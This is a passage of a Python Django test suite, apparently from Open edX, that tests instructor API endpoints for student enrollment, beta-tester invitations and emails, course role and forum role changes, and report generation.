user=self.enrolled_student, course_id=self.course.id
)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ENROLLED_TO_ENROLLED
assert course_enrollment.mode == 'verified'
def create_paid_course(self):
"""
        Create a course with a paid 'honor' course mode.
"""
paid_course = CourseFactory.create()
CourseModeFactory.create(course_id=paid_course.id, min_price=50, mode_slug=CourseMode.HONOR)
CourseInstructorRole(paid_course.id).add_users(self.instructor)
return paid_course
def test_unenrolled_allowed_to_enroll_user(self):
"""
        Test unenrolling a user who was only allowed to enroll.
"""
paid_course = self.create_paid_course()
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing..', 'role': 'Learner'}
response = self.client.post(url, params)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
assert response.status_code == 200
        # now register the user
UserFactory(email=self.notregistered_email)
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing', 'role': 'Learner'}
response = self.client.post(url, params)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 2
assert manual_enrollments[1].state_transition == ALLOWEDTOENROLL_TO_ENROLLED
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notregistered_email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": True,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": True,
}
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_unenrolled_already_not_enrolled_user(self):
"""
        Test unenrolling a user who is not enrolled in the course.
"""
paid_course = self.create_paid_course()
course_enrollment = CourseEnrollment.objects.filter(
user__email=self.notregistered_email, course_id=paid_course.id
)
assert course_enrollment.count() == 0
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'unenroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing', 'role': 'Learner'}
response = self.client.post(url, params)
assert response.status_code == 200
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notregistered_email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_unenroll_and_enroll_verified(self):
"""
Test that unenrolling and enrolling a student from a verified track
results in that student being in the default track
"""
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
# upgrade enrollment
course_enrollment.mode = 'verified'
course_enrollment.save()
assert course_enrollment.mode == 'verified'
self._change_student_enrollment(self.enrolled_student, self.course, 'unenroll')
self._change_student_enrollment(self.enrolled_student, self.course, 'enroll')
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
assert course_enrollment.mode == CourseMode.DEFAULT_MODE_SLUG
def test_reason_is_persisted(self):
"""
        Test that the reason field is persisted in the database.
"""
paid_course = self.create_paid_course()
url = reverse('students_update_enrollment', kwargs={'course_id': str(paid_course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False,
'auto_enroll': False, 'reason': 'testing'}
response = self.client.post(url, params)
manual_enrollment = ManualEnrollmentAudit.objects.first()
assert manual_enrollment.reason == 'testing'
assert response.status_code == 200
def _change_student_enrollment(self, user, course, action):
"""
Helper function that posts to 'students_update_enrollment' to change
a student's enrollment
"""
url = reverse(
'students_update_enrollment',
kwargs={'course_id': str(course.id)},
)
params = {
'identifiers': user.email,
'action': action,
'email_students': True,
'reason': 'change user enrollment',
'role': 'Learner'
}
response = self.client.post(url, params)
assert response.status_code == 200
return response
def test_get_enrollment_status(self):
"""Check that enrollment states are reported correctly."""
# enrolled, active
url = reverse(
'get_student_enrollment_status',
kwargs={'course_id': str(self.course.id)},
)
params = {
'unique_student_identifier': 'EnrolledStudent'
}
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for EnrolledStudent: active'
# unenrolled, inactive
CourseEnrollment.unenroll(
self.enrolled_student,
self.course.id
)
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for EnrolledStudent: inactive'
# invited, not yet registered
params = {
'unique_student_identifier': 'robot-allowed@robot.org'
}
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for robot-allowed@robot.org: pending'
# never enrolled or invited
params = {
'unique_student_identifier': 'nonotever@example.com'
}
response = self.client.post(url, params)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert res_json['enrollment_status'] == 'Enrollment status for nonotever@example.com: never enrolled'
@ddt.ddt
class TestInstructorAPIBulkBetaEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test bulk beta modify access endpoint.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
# Email URL values
cls.site_name = configuration_helpers.get_value(
'SITE_NAME',
settings.SITE_NAME
)
cls.about_path = f'/courses/{cls.course.id}/about'
cls.course_path = f'/courses/{cls.course.id}/'
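        # These mirror the about-page and course-home paths embedded in the
        # invitation emails, reused by the URL assertions in the tests below.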
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.beta_tester = BetaTesterFactory(course_key=self.course.id)
CourseEnrollment.enroll(
self.beta_tester,
self.course.id
)
assert CourseBetaTesterRole(self.course.id).has_user(self.beta_tester)
self.notenrolled_student = UserFactory(username='NotEnrolledStudent')
self.notregistered_email = 'robot-not-an-email-yet@robot.org'
assert User.objects.filter(email=self.notregistered_email).count() == 0
self.request = RequestFactory().request()
        # Uncomment to enable printing of large diffs from failed assertions
        # in the event of a test failure.
        # (Kept commented out because pylint flags C0103 invalid-name.)
# self.maxDiff = None
def test_beta_tester_must_not_earn_cert(self):
"""
        Test that a beta tester does not earn a certificate in a course
        in which they are a beta tester.
"""
with LogCapture() as capture:
message = 'Cancelling course certificate generation for user [{}] against course [{}], ' \
'user is a Beta Tester.'
message = message.format(self.beta_tester.username, self.course.id)
generate_user_certificates(self.beta_tester, self.course.id, self.course)
capture.check_present(('lms.djangoapps.certificates.generation_handler', 'INFO', message))
def test_missing_params(self):
""" Test missing all query parameters. """
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_bad_action(self):
""" Test with an invalid action. """
action = 'robot-not-an-action'
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.beta_tester.email, 'action': action})
assert response.status_code == 400
def add_notenrolled(self, response, identifier):
"""
Test Helper Method (not a test, called by other tests)
Takes a client response from a call to bulk_beta_modify_access with 'email_students': False,
and the student identifier (email or username) given as 'identifiers' in the request.
        Asserts the response returns cleanly, that the student was added as a beta tester, and the
response properly contains their identifier, 'error': False, and 'userDoesNotExist': False.
Additionally asserts no email was sent.
"""
assert response.status_code == 200
assert CourseBetaTesterRole(self.course.id).has_user(self.notenrolled_student)
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": identifier,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_add_notenrolled_email(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.email)
assert not CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
def test_add_notenrolled_email_autoenroll(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': False, 'auto_enroll': True}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.email)
assert CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
def test_add_notenrolled_username(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.username, 'action': 'add', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.username)
assert not CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
def test_add_notenrolled_username_autoenroll(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.username, 'action': 'add', 'email_students': False, 'auto_enroll': True}) # lint-amnesty, pylint: disable=line-too-long
self.add_notenrolled(response, self.notenrolled_student.username)
assert CourseEnrollment.is_enrolled(self.notenrolled_student, self.course.id)
@ddt.data('http', 'https')
def test_add_notenrolled_with_email(self, protocol):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
assert response.status_code == 200
assert CourseBetaTesterRole(self.course.id).has_user(self.notenrolled_student)
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": self.notenrolled_student.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to a beta test for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
student_name = self.notenrolled_student.profile.name
assert text_body.startswith(f'Dear {student_name}')
assert f'Visit {self.course.display_name}' in html_body
for body in [text_body, html_body]:
assert 'You have been invited to be a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert 'by a member of the course staff.' in body
assert 'enroll in this course and begin the beta test' in body
assert '{proto}://{site}{about_path}'.format(
proto=protocol,
site=self.site_name,
about_path=self.about_path,
) in body
assert 'This email was automatically sent from edx.org to {student_email}'.format(
student_email=self.notenrolled_student.email,
) in body
@ddt.data('http', 'https')
def test_add_notenrolled_with_email_autoenroll(self, protocol):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': True,
'auto_enroll': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
assert response.status_code == 200
assert CourseBetaTesterRole(self.course.id).has_user(self.notenrolled_student)
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": self.notenrolled_student.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to a beta test for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
student_name = self.notenrolled_student.profile.name
assert text_body.startswith(f'Dear {student_name}')
for body in [text_body, html_body]:
assert 'You have been invited to be a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert 'by a member of the course staff' in body
assert 'To start accessing course materials, please visit' in body
            assert '{proto}://{site}{course_path}'.format(
                proto=protocol,
                site=self.site_name,
                course_path=self.course_path
            ) in body
assert 'This email was automatically sent from edx.org to {student_email}'.format(
student_email=self.notenrolled_student.email,
) in body
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_add_notenrolled_email_mktgsite(self):
# Try with marketing site enabled
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': True}) # lint-amnesty, pylint: disable=line-too-long
assert response.status_code == 200
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
student_name = self.notenrolled_student.profile.name
assert text_body.startswith(f'Dear {student_name}')
for body in [text_body, html_body]:
assert 'You have been invited to be a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert 'by a member of the course staff.' in body
assert 'Visit edx.org' in body
assert 'enroll in this course and begin the beta test' in body
assert 'This email was automatically sent from edx.org to {student_email}'.format(
student_email=self.notenrolled_student.email,
) in body
def test_enroll_with_email_not_registered(self):
# User doesn't exist
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.notregistered_email, 'action': 'add', 'email_students': True,
'reason': 'testing'})
assert response.status_code == 200
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": self.notregistered_email,
"error": True,
"userDoesNotExist": True,
"is_active": None
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_remove_without_email(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.beta_tester.email, 'action': 'remove', 'email_students': False,
'reason': 'testing'})
assert response.status_code == 200
# Works around a caching bug which supposedly can't happen in prod. The instance here is not ==
# the instance fetched from the email above which had its cache cleared
if hasattr(self.beta_tester, '_roles'):
del self.beta_tester._roles
assert not CourseBetaTesterRole(self.course.id).has_user(self.beta_tester)
# test the response data
expected = {
"action": "remove",
"results": [
{
"identifier": self.beta_tester.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_remove_with_email(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.beta_tester.email, 'action': 'remove', 'email_students': True,
'reason': 'testing'})
assert response.status_code == 200
# Works around a caching bug which supposedly can't happen in prod. The instance here is not ==
# the instance fetched from the email above which had its cache cleared
if hasattr(self.beta_tester, '_roles'):
del self.beta_tester._roles
assert not CourseBetaTesterRole(self.course.id).has_user(self.beta_tester)
# test the response data
expected = {
"action": "remove",
"results": [
{
"identifier": self.beta_tester.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been removed from a beta test for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith(f'Dear {self.beta_tester.profile.name}')
for body in [text_body, html_body]:
assert 'You have been removed as a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert ('This course will remain on your dashboard, but you will no longer be '
'part of the beta testing group.') in body
assert 'Your other courses have not been affected.' in body
assert 'This email was automatically sent from edx.org to {email_address}'.format(
email_address=self.beta_tester.email,
) in body
class TestInstructorAPILevelsAccess(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change permissions
of other users.
This test does NOT test whether the actions had an effect on the
    database; that is the job of test_access.
This tests the response and action switch.
Actually, modify_access does not have a very meaningful
response yet, so only the status code is tested.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.other_instructor = InstructorFactory(course_key=self.course.id)
self.other_staff = StaffFactory(course_key=self.course.id)
self.other_user = UserFactory()
def test_modify_access_noparams(self):
""" Test missing all query parameters. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_modify_access_bad_action(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'staff',
'action': 'robot-not-an-action',
})
assert response.status_code == 400
def test_modify_access_bad_role(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'robot-not-a-roll',
'action': 'revoke',
})
assert response.status_code == 400
def test_modify_access_allow(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_user.email,
'rolename': 'staff',
'action': 'allow',
})
assert response.status_code == 200
def test_modify_access_allow_with_uname(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_instructor.username,
'rolename': 'staff',
'action': 'allow',
})
assert response.status_code == 200
def test_modify_access_revoke(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'staff',
'action': 'revoke',
})
assert response.status_code == 200
def test_modify_access_revoke_with_username(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.username,
'rolename': 'staff',
'action': 'revoke',
})
assert response.status_code == 200
def test_modify_access_with_fake_user(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': 'GandalfTheGrey',
'rolename': 'staff',
'action': 'revoke',
})
assert response.status_code == 200
expected = {
'unique_student_identifier': 'GandalfTheGrey',
'userDoesNotExist': True,
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_modify_access_with_inactive_user(self):
self.other_user.is_active = False
self.other_user.save()
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_user.username,
'rolename': 'beta',
'action': 'allow',
})
assert response.status_code == 200
expected = {
'unique_student_identifier': self.other_user.username,
'inactiveUser': True,
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_modify_access_revoke_not_allowed(self):
""" Test revoking access that a user does not have. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'instructor',
'action': 'revoke',
})
assert response.status_code == 200
def test_modify_access_revoke_self(self):
"""
        Test that an instructor cannot remove instructor privileges from themselves.
"""
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.instructor.email,
'rolename': 'instructor',
'action': 'revoke',
})
assert response.status_code == 200
# check response content
expected = {
'unique_student_identifier': self.instructor.username,
'rolename': 'instructor',
'action': 'revoke',
'removingSelfAsInstructor': True,
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_list_course_role_members_noparams(self):
""" Test missing all query parameters. """
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_list_course_role_members_bad_rolename(self):
""" Test with an invalid rolename parameter. """
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'rolename': 'robot-not-a-rolename',
})
assert response.status_code == 400
def test_list_course_role_members_staff(self):
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'rolename': 'staff',
})
assert response.status_code == 200
# check response content
expected = {
'course_id': str(self.course.id),
'staff': [
{
'username': self.other_staff.username,
'email': self.other_staff.email,
'first_name': self.other_staff.first_name,
'last_name': self.other_staff.last_name,
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_list_course_role_members_beta(self):
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'rolename': 'beta',
})
assert response.status_code == 200
# check response content
expected = {
'course_id': str(self.course.id),
'beta': []
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_update_forum_role_membership(self):
"""
Test update forum role membership with user's email and username.
"""
# Seed forum roles for course.
seed_permissions_roles(self.course.id)
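        # seed_permissions_roles creates the default forum roles for the course
        # (including the Administrator, Moderator and Community TA roles exercised below).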
for user in [self.instructor, self.other_user]:
for identifier_attr in [user.email, user.username]:
for rolename in ["Administrator", "Moderator", "Community TA"]:
for action in ["allow", "revoke"]:
self.assert_update_forum_role_membership(user, identifier_attr, rolename, action)
def assert_update_forum_role_membership(self, current_user, identifier, rolename, action):
"""
        Test updating forum role membership.
        Posts the given unique_student_identifier, rolename and action, then verifies the user's forum roles.
"""
url = reverse('update_forum_role_membership', kwargs={'course_id': str(self.course.id)})
response = self.client.post(
url,
{
'unique_student_identifier': identifier,
'rolename': rolename,
'action': action,
}
)
# Status code should be 200.
assert response.status_code == 200
user_roles = current_user.roles.filter(course_id=self.course.id).values_list("name", flat=True)
if action == 'allow':
assert rolename in user_roles
elif action == 'revoke':
assert rolename not in user_roles
@ddt.ddt
class TestInstructorAPILevelsDataDump(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints that show data without side effects.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.course_mode = CourseMode(course_id=self.course.id,
mode_slug="honor",
mode_display_name="honor cert",
min_price=40)
self.course_mode.save()
self.instructor = InstructorFactory(course_key=self.course.id)
CourseDataResearcherRole(self.course.id).add_users(self.instructor)
self.client.login(username=self.instructor.username, password='test')
self.students = [UserFactory() for _ in range(6)]
for student in self.students:
CourseEnrollment.enroll(student, self.course.id)
self.students_who_may_enroll = self.students + [UserFactory() for _ in range(5)]
for student in self.students_who_may_enroll:
CourseEnrollmentAllowed.objects.create(
email=student.email, course_id=self.course.id
)
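        # CourseEnrollmentAllowed rows represent invitations: the five extra users
        # are invited but not enrolled, which the may-enroll report covers.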
def test_get_problem_responses_invalid_location(self):
"""
Test whether get_problem_responses returns an appropriate status
message when users submit an invalid problem location.
"""
url = reverse(
'get_problem_responses',
kwargs={'course_id': str(self.course.id)}
)
problem_location = ''
response = self.client.post(url, {'problem_location': problem_location})
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == 'Could not find problem with this location.'
def valid_problem_location(test): # pylint: disable=no-self-argument
"""
Decorator for tests that target get_problem_responses endpoint and
        need to pretend the user submitted a valid problem location.
"""
@functools.wraps(test)
def wrapper(self, *args, **kwargs):
"""
Run `test` method, ensuring that UsageKey.from_string returns a
problem key that the get_problem_responses endpoint can
work with.
"""
mock_problem_key = NonCallableMock(return_value='')
mock_problem_key.course_key = self.course.id
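                # from_string is patched below so any location parses; the key must
                # carry the real course id because the endpoint rejects problem keys
                # that belong to a different course.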
with patch.object(UsageKey, 'from_string') as patched_method:
patched_method.return_value = mock_problem_key
test(self, *args, **kwargs)
return wrapper
@valid_problem_location
def test_get_problem_responses_successful(self):
"""
Test whether get_problem_responses returns an appropriate status
message if CSV generation was started successfully.
"""
url = reverse(
'get_problem_responses',
kwargs={'course_id': str(self.course.id)}
)
problem_location = ''
response = self.client.post(url, {'problem_location': problem_location})
res_json = json.loads(response.content.decode('utf-8'))
assert 'status' in res_json
status = res_json['status']
assert 'is being created' in status
assert 'already in progress' not in status
assert 'task_id' in res_json
@valid_problem_location
def test_get_problem_responses_already_running(self):
"""
Test whether get_problem_responses returns an appropriate status
message if CSV generation is already in progress.
"""
url = reverse(
'get_problem_responses',
kwargs={'course_id': str(self.course.id)}
)
task_type = 'problem_responses_csv'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_calculate_problem_responses_csv') as submit_task_function:
error = AlreadyRunningError(already_running_status)
submit_task_function.side_effect = error
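            # The view is expected to catch AlreadyRunningError and surface its
            # message as an HTTP 400, asserted below.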
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_students_features(self):
"""
        Test that a minimum set of student fields is formatted
        correctly in the response to get_students_features.
"""
for student in self.students:
student.profile.city = f"Mos Eisley {student.id}"
student.profile.save()
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert 'students' in res_json
for student in self.students:
student_json = [
x for x in res_json['students']
if x['username'] == student.username
][0]
assert student_json['username'] == student.username
assert student_json['email'] == student.email
assert student_json['city'] == student.profile.city
assert student_json['country'] == ''
@ddt.data(True, False)
def test_get_students_features_cohorted(self, is_cohorted):
"""
Test that get_students_features includes cohort info when the course is
cohorted, and does not when the course is not cohorted.
"""
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
set_course_cohorted(self.course.id, is_cohorted)
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert ('cohort' in res_json['feature_names']) == is_cohorted
@ddt.data(True, False)
def test_get_students_features_teams(self, has_teams):
"""
        Test that get_students_features includes team info when the course
        has teams enabled, and does not when it does not.
"""
if has_teams:
self.course = CourseFactory.create(teams_configuration=TeamsConfig({
'max_size': 2, 'topics': [{'id': 'topic', 'name': 'Topic', 'description': 'A Topic'}]
}))
course_instructor = InstructorFactory(course_key=self.course.id)
CourseDataResearcherRole(self.course.id).add_users(course_instructor)
self.client.login(username=course_instructor.username, password='test')
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert ('team' in res_json['feature_names']) == has_teams
@ddt.data(True, False)
def test_get_students_features_external_user_key(self, has_program_enrollments):
external_key_dict = {}
if has_program_enrollments:
            for i, student in enumerate(self.students):
external_key = "{}_{}".format(student.username, i)
ProgramEnrollmentFactory.create(user=student, external_user_key=external_key)
external_key_dict[student.username] = external_key
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert 'external_user_key' in res_json['feature_names']
for student in self.students:
student_json = [
x for x in res_json['students']
if x['username'] == student.username
][0]
assert student_json['username'] == student.username
if has_program_enrollments:
assert student_json['external_user_key'] == external_key_dict[student.username]
else:
assert student_json['external_user_key'] == ''
def test_get_students_who_may_enroll(self):
"""
Test whether get_students_who_may_enroll returns an appropriate
status message when users request a CSV file of students who
may enroll in a course.
"""
url = reverse(
'get_students_who_may_enroll',
kwargs={'course_id': str(self.course.id)}
)
# Successful case:
response = self.client.post(url, {})
assert response.status_code == 200
# CSV generation already in progress:
task_type = 'may_enroll_info_csv'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_calculate_may_enroll_csv') as submit_task_function:
error = AlreadyRunningError(already_running_status)
submit_task_function.side_effect = error
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_student_exam_results(self):
"""
Test whether get_proctored_exam_results returns an appropriate
status message when users request a CSV file.
"""
url = reverse(
'get_proctored_exam_results',
kwargs={'course_id': str(self.course.id)}
)
# Successful case:
response = self.client.post(url, {})
assert response.status_code == 200
# CSV generation already in progress:
task_type = 'proctored_exam_results_report'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_proctored_exam_results_report') as submit_task_function:
error = AlreadyRunningError(already_running_status)
submit_task_function.side_effect = error
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_access_course_finance_admin_with_invalid_course_key(self):
"""
        Test that require_finance_admin rejects an invalid course key
        before generating a detailed enrollment report.
"""
func = Mock()
decorated_func = require_finance_admin(func)
request = self.mock_request()
response = decorated_func(request, 'invalid_course_key')
assert response.status_code == 404
assert not func.called
def mock_request(self):
"""
        Build a mock request authenticated as the instructor.
"""
request = Mock()
request.user = self.instructor
return request
def test_access_course_finance_admin_with_valid_course_key(self):
"""
        Test that a valid course key without the finance_admin role
        yields a 403 and the wrapped function is not called.
"""
func = Mock()
decorated_func = require_finance_admin(func)
request = self.mock_request()
response = decorated_func(request, 'valid/course/key')
assert response.status_code == 403
assert not func.called
    def test_add_user_to_finance_admin_role_with_valid_course(self):
        """
        Test that the wrapped function is called once the user has been
        granted finance_admin rights.
"""
func = Mock()
decorated_func = require_finance_admin(func)
request = self.mock_request()
CourseFinanceAdminRole(self.course.id).add_users(self.instructor)
decorated_func(request, str(self.course.id))
assert func.called
@patch('lms.djangoapps.instructor_task.models.logger.error')
@patch.dict(settings.GRADES_DOWNLOAD, {'STORAGE_TYPE': 's3', 'ROOT_PATH': 'tmp/edx-s3/grades'})
def test_list_report_downloads_error(self, mock_error):
"""
        Tests that an exceeded S3 rate limit is handled and does not raise a 500 error.
"""
ex_status = 503
ex_reason = 'Slow Down'
url = reverse('list_report_downloads', kwargs={'course_id': str(self.course.id)})
with patch('storages.backends.s3boto.S3BotoStorage.listdir', side_effect=BotoServerError(ex_status, ex_reason)):
response = self.client.post(url, {})
mock_error.assert_called_with(
'Fetching files failed for course: %s, status: %s, reason: %s',
self.course.id,
ex_status,
ex_reason,
)
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == {'downloads': []}
def test_list_report_downloads(self):
url = reverse('list_report_downloads', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor_task.models.DjangoStorageReportStore.links_for') as mock_links_for:
mock_links_for.return_value = [
